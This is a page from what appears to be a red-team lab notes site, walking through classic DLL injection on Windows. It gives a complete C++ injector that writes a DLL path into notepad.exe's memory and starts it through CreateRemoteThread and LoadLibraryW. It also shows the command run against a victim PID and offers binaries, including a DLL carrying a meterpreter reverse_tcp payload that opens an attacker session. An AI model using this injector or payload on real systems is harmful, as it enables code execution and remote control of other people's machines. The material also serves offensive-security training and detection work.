Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
CreateRemoteThread Shellcode Injection
DLL Injection
Reflective DLL Injection
Shellcode Reflective DLL Injection
Process Doppelganging
Loading and Executing Shellcode From PE Resources
Process Hollowing and Portable Executable Relocations
APC Queue Code Injection
Early Bird APC Queue Code Injection
Shellcode Execution in a Local Process with QueueUserAPC and NtTestAlert
Shellcode Execution through Fibers
Shellcode Execution via CreateThreadpoolWait
Local Shellcode Execution without Windows APIs
Injecting to Remote Process via Thread Hijacking
SetWindowHookEx Code Injection
Finding Kernel32 Base and Function Addresses in Shellcode
Executing Shellcode with Inline Assembly in C/C++
Writing Custom Shellcode Encoders and Decoders
Backdooring PE Files with Shellcode
NtCreateSection + NtMapViewOfSection Code Injection
AddressOfEntryPoint Code Injection without VirtualAllocEx RWX
Module Stomping for Shellcode Injection
PE Injection: Executing PEs inside Remote Processes
API Monitoring and Hooking for Offensive Tooling
Windows API Hooking
Import Adress Table (IAT) Hooking
DLL Injection via a Custom .NET Garbage Collector
Writing and Compiling Shellcode in C
Injecting .NET Assembly to an Unmanaged Process
Binary Exploitation
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
DLL Injection
Injecting DLL into a remote process.
This lab attempts a classic DLL injection into a remote process.

Execution

inject-dll.cpp
1
int main(int argc, char *argv[]) {
2
HANDLE processHandle;
3
PVOID remoteBuffer;
4
wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
5
6
printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
7
processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
8
remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
9
WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
10
PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
11
CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
12
CloseHandle(processHandle);
13
14
return 0;
15
}
Copied!
Compiling the above code and executing it with a supplied argument of 4892 which is a PID of the notepad.exe process on the victim system:
[email protected]
1
PS C:\experiments\inject1\x64\Debug> .\inject1.exe 4892
2
Injecting DLL to PID: 4892
Copied!
After the DLL is successfully injected, the attacker receives a meterpreter session from the injected process and its privileges:
inject1.exe
60KB
Binary
DLL injector.exe
evilm64.dll
5KB
Binary
c:\experiments\evilm64.dll (windows/x64/meterpreter/reverse_tcp)

Observations

Note how the notepad spawned rundll32 which then spawned a cmd.exe because of the meterpreter payload (and attacker's shell command) that got executed as part of the injected evilm64.dll into the notepad process:

References

https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
msdn.microsoft.com
https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx
msdn.microsoft.com
​
Previous
CreateRemoteThread Shellcode Injection
Next
Reflective DLL Injection
Last modified 3yr ago
Copy link
Contents
Execution
Observations
References